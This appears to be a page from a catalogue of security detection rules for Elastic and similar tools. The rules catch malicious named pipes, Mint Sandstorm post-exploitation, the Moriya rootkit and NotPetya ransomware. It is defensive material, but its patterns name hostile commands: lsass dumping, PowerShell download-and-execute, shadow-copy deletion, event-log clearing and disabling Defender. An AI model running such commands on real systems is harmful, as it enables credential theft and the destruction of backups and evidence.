Hashes:(*SHA256\=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896* OR *SHA1\=BF939C9C261D27EE7BB92325CC588624FCA75429* OR *MD5\=74BC2D0B6680FAA1A5A76B27E5479CBC* OR *SHA256\=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03* OR *SHA1\=20D554A80D759C50D6537DD7097FED84DD258B3E* OR *MD5\=82187AD3F0C6C225E2FBA0C867280CC9* OR *SHA256\=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952* OR *SHA1\=894E7D4FFD764BB458809C7F0643694B036EAD30* OR *MD5\=11BC82A9BD8297BD0823BCE5D6202082* OR *SHA256\=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423* OR *SHA1\=3B3E778B647371262120A523EB873C20BB82BEAF* OR *MD5\=7FAEA2B01796B80D180399040BB69835*)
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
Show query
any where PipeName like~ ("\\46a676ab7f179e511e30dd2dc41bd388", "\\583da945-62af-10e8-4902-a8f205c72b2e", "\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7", "\\9f81f59bc58452127884ce513865ed20", "\\adschemerpc", "\\ahexec", "\\AnonymousPipe", "\\bc31a7", "\\bc367", "\\bizkaz", "\\csexecsvc", "\\dce_3d", "\\e710f28d59aa529d6792ca6ff0ca1b34", "\\gruntsvc", "\\isapi_dg", "\\isapi_dg2", "\\isapi_http", "\\jaccdpqnvbrrxlaf", "\\lsassw", "\\NamePipe_MoreWindows", "\\pcheap_reuse", "\\Posh*", "\\rpchlp_3", "\\sdlrpc", "\\svcctl", "\\testPipe", "\\winsession")Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
Show query
from * metadata _id, _index, _version | where PipeName=="\\46a676ab7f179e511e30dd2dc41bd388" or PipeName=="\\583da945-62af-10e8-4902-a8f205c72b2e" or PipeName=="\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7" or PipeName=="\\9f81f59bc58452127884ce513865ed20" or PipeName=="\\adschemerpc" or PipeName=="\\ahexec" or PipeName=="\\AnonymousPipe" or PipeName=="\\bc31a7" or PipeName=="\\bc367" or PipeName=="\\bizkaz" or PipeName=="\\csexecsvc" or PipeName=="\\dce_3d" or PipeName=="\\e710f28d59aa529d6792ca6ff0ca1b34" or PipeName=="\\gruntsvc" or PipeName=="\\isapi_dg" or PipeName=="\\isapi_dg2" or PipeName=="\\isapi_http" or PipeName=="\\jaccdpqnvbrrxlaf" or PipeName=="\\lsassw" or PipeName=="\\NamePipe_MoreWindows" or PipeName=="\\pcheap_reuse" or starts_with(PipeName, "\\Posh") or PipeName=="\\rpchlp_3" or PipeName=="\\sdlrpc" or PipeName=="\\svcctl" or PipeName=="\\testPipe" or PipeName=="\\winsession"
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
Show query
PipeName:(\\46a676ab7f179e511e30dd2dc41bd388 OR \\583da945\-62af\-10e8\-4902\-a8f205c72b2e OR \\6e7645c4\-32c5\-4fe3\-aabf\-e94c2f4370e7 OR \\9f81f59bc58452127884ce513865ed20 OR \\adschemerpc OR \\ahexec OR \\AnonymousPipe OR \\bc31a7 OR \\bc367 OR \\bizkaz OR \\csexecsvc OR \\dce_3d OR \\e710f28d59aa529d6792ca6ff0ca1b34 OR \\gruntsvc OR \\isapi_dg OR \\isapi_dg2 OR \\isapi_http OR \\jaccdpqnvbrrxlaf OR \\lsassw OR \\NamePipe_MoreWindows OR \\pcheap_reuse OR \\Posh* OR \\rpchlp_3 OR \\sdlrpc OR \\svcctl OR \\testPipe OR \\winsession)
Malicious Remote File Creation
Malicious remote file creation, which can be an indicator of lateral movement activity.
Elastic
Original
KQL
critical
Malware - Detected - Elastic Endgame
Elastic Endgame detected Malware. Click the Elastic Endgame icon in the event.module column or the link in the
rule.reference column for additional information.
Elastic
Converted
EQL
critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
Show query
any where (ParentImage:"*aspera*" and ParentImage:"*\\ruby*") and (((Image like~ ("*\\powershell.exe", "*\\powershell_ise.exe")) and ((CommandLine like~ ("* echo *", "*-dumpmode*", "*-ssh*", "*.dmp*", "*add-MpPreference*", "*adscredentials*", "*bitsadmin*", "*certutil*", "*csvhost.exe*", "*DownloadFile*", "*DownloadString*", "*dsquery*", "*ekern.exe*", "*FromBase64String*", "*iex *", "*iex(*", "*Invoke-Expression*", "*Invoke-WebRequest*", "*localgroup administrators*", "*o365accountconfiguration*", "*samaccountname=*", "*set-MpPreference*", "*svhost.exe*", "*System.IO.Compression*", "*System.IO.MemoryStream*", "*usoprivate*", "*usoshared*", "*whoami*")) or (CommandLine regex~ "[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}" or CommandLine regex~ "net\s+user" or CommandLine regex~ "net\s+group" or CommandLine regex~ "query\s+session"))) or (CommandLine:"*lsass*" and (CommandLine like~ ("*procdump*", "*tasklist*", "*findstr*"))) or ((Image:"*\\wget.exe" and CommandLine:"*http*") or (Image:"*\\curl.exe" and CommandLine:"*http*") or (CommandLine like~ ("*E:jscript*", "*e:vbscript*")) or (CommandLine:"*localgroup Administrators*" and CommandLine:"*/add*") or (CommandLine:"*net*" and (CommandLine:"*user*" and CommandLine:"*/add*")) or ((CommandLine:"*reg add*" and CommandLine:"*DisableAntiSpyware*" and CommandLine:"*\\Microsoft\\Windows Defender*") or (CommandLine:"*reg add*" and CommandLine:"*DisableRestrictedAdmin*" and CommandLine:"*CurrentControlSet\\Control\\Lsa*")) or (CommandLine:"*wmic*" and CommandLine:"*process call create*") or (CommandLine:"*wmic*" and CommandLine:"*delete*" and CommandLine:"*shadowcopy*") or (CommandLine:"*vssadmin*" and CommandLine:"*delete*" and CommandLine:"*shadows*") or (CommandLine:"*wbadmin*" and CommandLine:"*delete*" and CommandLine:"*catalog*")))
Elastic
Converted
ES|QL
critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
Show query
from * metadata _id, _index, _version | where ParentImage like "*aspera*" and ParentImage like "*\\ruby*" and ((ends_with(Image, "\\powershell.exe") or ends_with(Image, "\\powershell_ise.exe")) and (CommandLine like "* echo *" or CommandLine like "*-dumpmode*" or CommandLine like "*-ssh*" or CommandLine like "*.dmp*" or CommandLine like "*add-MpPreference*" or CommandLine like "*adscredentials*" or CommandLine like "*bitsadmin*" or CommandLine like "*certutil*" or CommandLine like "*csvhost.exe*" or CommandLine like "*DownloadFile*" or CommandLine like "*DownloadString*" or CommandLine like "*dsquery*" or CommandLine like "*ekern.exe*" or CommandLine like "*FromBase64String*" or CommandLine like "*iex *" or CommandLine like "*iex(*" or CommandLine like "*Invoke-Expression*" or CommandLine like "*Invoke-WebRequest*" or CommandLine like "*localgroup administrators*" or CommandLine like "*o365accountconfiguration*" or CommandLine like "*samaccountname=*" or CommandLine like "*set-MpPreference*" or CommandLine like "*svhost.exe*" or CommandLine like "*System.IO.Compression*" or CommandLine like "*System.IO.MemoryStream*" or CommandLine like "*usoprivate*" or CommandLine like "*usoshared*" or CommandLine like "*whoami*" or CommandLine rlike "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or CommandLine rlike "net\\s+user" or CommandLine rlike "net\\s+group" or CommandLine rlike "query\\s+session") or CommandLine like "*lsass*" and (CommandLine like "*procdump*" or CommandLine like "*tasklist*" or CommandLine like "*findstr*") or ends_with(Image, "\\wget.exe") and CommandLine like "*http*" or ends_with(Image, "\\curl.exe") and CommandLine like "*http*" or CommandLine like "*E:jscript*" or CommandLine like "*e:vbscript*" or CommandLine like "*localgroup Administrators*" and CommandLine like "*/add*" or CommandLine like "*net*" and CommandLine like "*user*" and CommandLine like "*/add*" or CommandLine like "*reg add*" and CommandLine like "*DisableAntiSpyware*" and CommandLine like "*\\Microsoft\\Windows Defender*" or CommandLine like "*reg add*" and CommandLine like "*DisableRestrictedAdmin*" and CommandLine like "*CurrentControlSet\\Control\\Lsa*" or CommandLine like "*wmic*" and CommandLine like "*process call create*" or CommandLine like "*wmic*" and CommandLine like "*delete*" and CommandLine like "*shadowcopy*" or CommandLine like "*vssadmin*" and CommandLine like "*delete*" and CommandLine like "*shadows*" or CommandLine like "*wbadmin*" and CommandLine like "*delete*" and CommandLine like "*catalog*")
Elastic
Converted
Lucene
critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
Show query
(ParentImage:*aspera* AND ParentImage:*\\ruby*) AND (((Image:(*\\powershell.exe OR *\\powershell_ise.exe)) AND ((CommandLine:(*\ echo\ * OR *\-dumpmode* OR *\-ssh* OR *.dmp* OR *add\-MpPreference* OR *adscredentials* OR *bitsadmin* OR *certutil* OR *csvhost.exe* OR *DownloadFile* OR *DownloadString* OR *dsquery* OR *ekern.exe* OR *FromBase64String* OR *iex\ * OR *iex\(* OR *Invoke\-Expression* OR *Invoke\-WebRequest* OR *localgroup\ administrators* OR *o365accountconfiguration* OR *samaccountname\=* OR *set\-MpPreference* OR *svhost.exe* OR *System.IO.Compression* OR *System.IO.MemoryStream* OR *usoprivate* OR *usoshared* OR *whoami*)) OR (CommandLine:/[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}/ OR CommandLine:/net\s+user/ OR CommandLine:/net\s+group/ OR CommandLine:/query\s+session/))) OR (CommandLine:*lsass* AND (CommandLine:(*procdump* OR *tasklist* OR *findstr*))) OR ((Image:*\\wget.exe AND CommandLine:*http*) OR (Image:*\\curl.exe AND CommandLine:*http*) OR (CommandLine:(*E\:jscript* OR *e\:vbscript*)) OR (CommandLine:*localgroup\ Administrators* AND CommandLine:*\/add*) OR (CommandLine:*net* AND (CommandLine:*user* AND CommandLine:*\/add*)) OR ((CommandLine:*reg\ add* AND CommandLine:*DisableAntiSpyware* AND CommandLine:*\\Microsoft\\Windows\ Defender*) OR (CommandLine:*reg\ add* AND CommandLine:*DisableRestrictedAdmin* AND CommandLine:*CurrentControlSet\\Control\\Lsa*)) OR (CommandLine:*wmic* AND CommandLine:*process\ call\ create*) OR (CommandLine:*wmic* AND CommandLine:*delete* AND CommandLine:*shadowcopy*) OR (CommandLine:*vssadmin* AND CommandLine:*delete* AND CommandLine:*shadows*) OR (CommandLine:*wbadmin* AND CommandLine:*delete* AND CommandLine:*catalog*)))
Elastic
Converted
EQL
critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
Show query
any where ((ParentImage like~ ("*manageengine*", "*ServiceDesk*")) and ParentImage:"*\\java*") and (((Image like~ ("*\\powershell.exe", "*\\powershell_ise.exe")) and ((CommandLine like~ ("* echo *", "*-dumpmode*", "*-ssh*", "*.dmp*", "*add-MpPreference*", "*adscredentials*", "*bitsadmin*", "*certutil*", "*csvhost.exe*", "*DownloadFile*", "*DownloadString*", "*dsquery*", "*ekern.exe*", "*FromBase64String*", "*iex *", "*iex(*", "*Invoke-Expression*", "*Invoke-WebRequest*", "*localgroup administrators*", "*o365accountconfiguration*", "*samaccountname=*", "*set-MpPreference*", "*svhost.exe*", "*System.IO.Compression*", "*System.IO.MemoryStream*", "*usoprivate*", "*usoshared*", "*whoami*")) or CommandLine regex~ "[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}" or CommandLine regex~ "net\s+user" or CommandLine regex~ "net\s+group" or CommandLine regex~ "query\ssession")) or (CommandLine:"*lsass*" and (CommandLine like~ ("*procdump*", "*tasklist*", "*findstr*"))) or ((Image:"*\\wget.exe" and CommandLine:"*http*") or (Image:"*\\curl.exe" and CommandLine:"*http*") or (CommandLine like~ ("*E:jscript*", "*e:vbscript*")) or (CommandLine:"*localgroup Administrators*" and CommandLine:"*/add*") or (CommandLine:"*net*" and (CommandLine:"*user*" and CommandLine:"*/add*")) or ((CommandLine:"*reg add*" and CommandLine:"*DisableAntiSpyware*" and CommandLine:"*\\Microsoft\\Windows Defender*") or (CommandLine:"*reg add*" and CommandLine:"*DisableRestrictedAdmin*" and CommandLine:"*CurrentControlSet\\Control\\Lsa*")) or (CommandLine:"*wmic*" and CommandLine:"*process call create*") or (CommandLine:"*wmic*" and CommandLine:"*delete*" and CommandLine:"*shadowcopy*") or (CommandLine:"*vssadmin*" and CommandLine:"*delete*" and CommandLine:"*shadows*") or (CommandLine:"*wbadmin*" and CommandLine:"*delete*" and CommandLine:"*catalog*"))) and (not (CommandLine:"*download.microsoft.com*" and CommandLine:"*manageengine.com*" and CommandLine:"*msiexec*"))
Elastic
Converted
ES|QL
critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
Show query
from * metadata _id, _index, _version | where (ParentImage like "*manageengine*" or ParentImage like "*ServiceDesk*") and ParentImage like "*\\java*" and ((ends_with(Image, "\\powershell.exe") or ends_with(Image, "\\powershell_ise.exe")) and (CommandLine like "* echo *" or CommandLine like "*-dumpmode*" or CommandLine like "*-ssh*" or CommandLine like "*.dmp*" or CommandLine like "*add-MpPreference*" or CommandLine like "*adscredentials*" or CommandLine like "*bitsadmin*" or CommandLine like "*certutil*" or CommandLine like "*csvhost.exe*" or CommandLine like "*DownloadFile*" or CommandLine like "*DownloadString*" or CommandLine like "*dsquery*" or CommandLine like "*ekern.exe*" or CommandLine like "*FromBase64String*" or CommandLine like "*iex *" or CommandLine like "*iex(*" or CommandLine like "*Invoke-Expression*" or CommandLine like "*Invoke-WebRequest*" or CommandLine like "*localgroup administrators*" or CommandLine like "*o365accountconfiguration*" or CommandLine like "*samaccountname=*" or CommandLine like "*set-MpPreference*" or CommandLine like "*svhost.exe*" or CommandLine like "*System.IO.Compression*" or CommandLine like "*System.IO.MemoryStream*" or CommandLine like "*usoprivate*" or CommandLine like "*usoshared*" or CommandLine like "*whoami*" or CommandLine rlike "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or CommandLine rlike "net\\s+user" or CommandLine rlike "net\\s+group" or CommandLine rlike "query\\ssession") or CommandLine like "*lsass*" and (CommandLine like "*procdump*" or CommandLine like "*tasklist*" or CommandLine like "*findstr*") or ends_with(Image, "\\wget.exe") and CommandLine like "*http*" or ends_with(Image, "\\curl.exe") and CommandLine like "*http*" or CommandLine like "*E:jscript*" or CommandLine like "*e:vbscript*" or CommandLine like "*localgroup Administrators*" and CommandLine like "*/add*" or CommandLine like "*net*" and CommandLine like "*user*" and CommandLine like "*/add*" or CommandLine like "*reg add*" and CommandLine like "*DisableAntiSpyware*" and CommandLine like "*\\Microsoft\\Windows Defender*" or CommandLine like "*reg add*" and CommandLine like "*DisableRestrictedAdmin*" and CommandLine like "*CurrentControlSet\\Control\\Lsa*" or CommandLine like "*wmic*" and CommandLine like "*process call create*" or CommandLine like "*wmic*" and CommandLine like "*delete*" and CommandLine like "*shadowcopy*" or CommandLine like "*vssadmin*" and CommandLine like "*delete*" and CommandLine like "*shadows*" or CommandLine like "*wbadmin*" and CommandLine like "*delete*" and CommandLine like "*catalog*") and not (CommandLine like "*download.microsoft.com*" and CommandLine like "*manageengine.com*" and CommandLine like "*msiexec*")
Elastic
Converted
Lucene
critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
Show query
((ParentImage:(*manageengine* OR *ServiceDesk*)) AND ParentImage:*\\java*) AND (((Image:(*\\powershell.exe OR *\\powershell_ise.exe)) AND ((CommandLine:(*\ echo\ * OR *\-dumpmode* OR *\-ssh* OR *.dmp* OR *add\-MpPreference* OR *adscredentials* OR *bitsadmin* OR *certutil* OR *csvhost.exe* OR *DownloadFile* OR *DownloadString* OR *dsquery* OR *ekern.exe* OR *FromBase64String* OR *iex\ * OR *iex\(* OR *Invoke\-Expression* OR *Invoke\-WebRequest* OR *localgroup\ administrators* OR *o365accountconfiguration* OR *samaccountname\=* OR *set\-MpPreference* OR *svhost.exe* OR *System.IO.Compression* OR *System.IO.MemoryStream* OR *usoprivate* OR *usoshared* OR *whoami*)) OR CommandLine:/[-\/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+\/=]{15,}/ OR CommandLine:/net\s+user/ OR CommandLine:/net\s+group/ OR CommandLine:/query\ssession/)) OR (CommandLine:*lsass* AND (CommandLine:(*procdump* OR *tasklist* OR *findstr*))) OR ((Image:*\\wget.exe AND CommandLine:*http*) OR (Image:*\\curl.exe AND CommandLine:*http*) OR (CommandLine:(*E\:jscript* OR *e\:vbscript*)) OR (CommandLine:*localgroup\ Administrators* AND CommandLine:*\/add*) OR (CommandLine:*net* AND (CommandLine:*user* AND CommandLine:*\/add*)) OR ((CommandLine:*reg\ add* AND CommandLine:*DisableAntiSpyware* AND CommandLine:*\\Microsoft\\Windows\ Defender*) OR (CommandLine:*reg\ add* AND CommandLine:*DisableRestrictedAdmin* AND CommandLine:*CurrentControlSet\\Control\\Lsa*)) OR (CommandLine:*wmic* AND CommandLine:*process\ call\ create*) OR (CommandLine:*wmic* AND CommandLine:*delete* AND CommandLine:*shadowcopy*) OR (CommandLine:*vssadmin* AND CommandLine:*delete* AND CommandLine:*shadows*) OR (CommandLine:*wbadmin* AND CommandLine:*delete* AND CommandLine:*catalog*))) AND (NOT (CommandLine:*download.microsoft.com* AND CommandLine:*manageengine.com* AND CommandLine:*msiexec*))Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
Show query
any where Provider_Name:"Service Control Manager" and EventID:7045 and ServiceName:"ZzNetSvc"
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
Show query
from * metadata _id, _index, _version | where Provider_Name=="Service Control Manager" and EventID==7045 and ServiceName=="ZzNetSvc"
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
Show query
Provider_Name:Service\ Control\ Manager AND EventID:7045 AND ServiceName:ZzNetSvc
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
Show query
any where TargetFilename:"C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
Show query
from * metadata _id, _index, _version | where TargetFilename=="C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
Show query
TargetFilename:C\:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys
Elastic
Original
ESQL
critical
Multiple Alerts on a Host Exhibiting CPU Spike
This rule correlates multiple security alerts from a host exhibiting unusually high CPU utilization within a short time window.
This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution,
or abuse of system resources following initial compromise.
Elastic
Original
ESQL
critical
Multiple Rare Elastic Defend Behavior Rules by Host
Identifies hosts that triggered multiple distinct Elastic Defend behavior rules, while reducing false positives by
considering only behavior rules that appear on a single host globally (via INLINE STATS). Hosts with two or more
such rare behavior rules are more likely to be compromised and warrant prioritized triage.
Elastic
Original
ESQL
critical
Multiple Vulnerabilities by Asset via Wiz
This alert identifies assets with an elevated number of vulnerabilities reported by Wiz, potentially indicating weak security posture,
missed patching, or active exposure. The rule highlights assets with a high volume of distinct vulnerabilities, the presence of exploitable
vulnerabilities, or a combination of multiple severities, helping prioritize assets that pose increased risk.
Elastic
Original
ESQL
critical
Newly Observed FortiGate Alert
This rule detects FortiGate alerts that are observed for the first time in the previous 5 days of alert history.
Analysts can use this to prioritize triage and response.
Elastic
Original
ESQL
critical
Newly Observed High Severity Suricata Alert
This rule detects Suricata high severity alerts that are observed for the first time in the previous 5 days of alert history.
Analysts can use this to prioritize triage and response.
Elastic
Original
ESQL
critical
Newly Observed Palo Alto Network Alert
This rule detects Palo Alto Network alerts that are observed for the first time in the previous 5 days of alert history.
Analysts can use this to prioritize triage and response.
NotPetya Ransomware Activity
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
Show query
any where (CommandLine like~ ("*wevtutil cl Application & fsutil usn deletejournal /D C:*", "*dllhost.dat %WINDIR%\\ransoms*")) or (Image:"*\\rundll32.exe" and (CommandLine like~ ("*.dat,#1", "*.dat #1", "*.zip.dll\",#1"))) or "\\perfc.dat"Showing 251-300 of 12,781